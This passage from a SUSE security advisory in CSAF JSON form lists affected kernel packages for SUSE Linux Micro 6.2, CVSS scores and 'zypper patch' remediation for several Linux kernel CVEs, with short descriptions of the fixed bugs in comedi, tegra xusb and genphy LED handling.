"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38529"
},
{
"cve": "CVE-2025-38530",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38530"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl812: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 board-\u003eirq_bits) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38530",
"url": "https://www.suse.com/security/cve/CVE-2025-38530"
},
{
"category": "external",
"summary": "SUSE Bug 1248206 for CVE-2025-38530",
"url": "https://bugzilla.suse.com/1248206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38530"
},
{
"cve": "CVE-2025-38535",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38535"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Fix unbalanced regulator disable in UTMI PHY mode\n\nWhen transitioning from USB_ROLE_DEVICE to USB_ROLE_NONE, the code\nassumed that the regulator should be disabled. However, if the regulator\nis marked as always-on, regulator_is_enabled() continues to return true,\nleading to an incorrect attempt to disable a regulator which is not\nenabled.\n\nThis can result in warnings such as:\n\n[ 250.155624] WARNING: CPU: 1 PID: 7326 at drivers/regulator/core.c:3004\n_regulator_disable+0xe4/0x1a0\n[ 250.155652] unbalanced disables for VIN_SYS_5V0\n\nTo fix this, we move the regulator control logic into\ntegra186_xusb_padctl_id_override() function since it\u0027s directly related\nto the ID override state. The regulator is now only disabled when the role\ntransitions from USB_ROLE_HOST to USB_ROLE_NONE, by checking the VBUS_ID\nregister. This ensures that regulator enable/disable operations are\nproperly balanced and only occur when actually transitioning to/from host\nmode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38535",
"url": "https://www.suse.com/security/cve/CVE-2025-38535"
},
{
"category": "external",
"summary": "SUSE Bug 1248240 for CVE-2025-38535",
"url": "https://bugzilla.suse.com/1248240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38535"
},
{
"cve": "CVE-2025-38537",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38537"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: Don\u0027t register LEDs for genphy\n\nIf a PHY has no driver, the genphy driver is probed/removed directly in\nphy_attach/detach. If the PHY\u0027s ofnode has an \"leds\" subnode, then the\nLEDs will be (un)registered when probing/removing the genphy driver.\nThis could occur if the leds are for a non-generic driver that isn\u0027t\nloaded for whatever reason. Synchronously removing the PHY device in\nphy_detach leads to the following deadlock:\n\nrtnl_lock()\nndo_close()\n ...\n phy_detach()\n phy_remove()\n phy_leds_unregister()\n led_classdev_unregister()\n led_trigger_set()\n netdev_trigger_deactivate()\n unregister_netdevice_notifier()\n rtnl_lock()\n\nThere is a corresponding deadlock on the open/register side of things\n(and that one is reported by lockdep), but it requires a race while this\none is deterministic.\n\nGeneric PHYs do not support LEDs anyway, so don\u0027t bother registering\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38537",
"url": "https://www.suse.com/security/cve/CVE-2025-38537"
},
{
"category": "external",
"summary": "SUSE Bug 1248229 for CVE-2025-38537",
"url": "https://bugzilla.suse.com/1248229"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
